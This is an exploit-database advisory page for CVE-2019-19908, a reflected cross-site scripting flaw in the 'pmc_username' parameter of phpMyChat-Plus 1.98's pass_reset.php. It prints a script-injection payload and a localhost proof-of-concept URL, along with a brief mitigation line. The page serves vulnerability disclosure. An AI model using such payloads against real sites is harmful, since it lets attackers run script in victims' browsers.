header-logo
Suggest Exploit
vendor:
phpMyChat-Plus
by:
Chris Inzinga
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting
79
CWE
Product Name: phpMyChat-Plus
Affected Version From: 1.98
Affected Version To: 1.98
Patch Exists: YES
Related CWE: CVE-2019-19908
CPE: a:ciprianmp:phpmychat_plus:1.98
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux & Mac
2019

phpMyChat-Plus 1.98 – ‘pmc_username’ Reflected Cross-Site Scripting

The 'pmc_username' parameter of pass_reset.php is vulnerable to reflected XSS. Payload: '><script>alert('xss')</script> Vulnerable URL: http://localhost/plus/pass_reset.php?L=english&pmc_username=''><script>alert('xss')</script>

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description: 
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload: 
"><script>alert('xss')</script>

Vulnerable URL: 
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>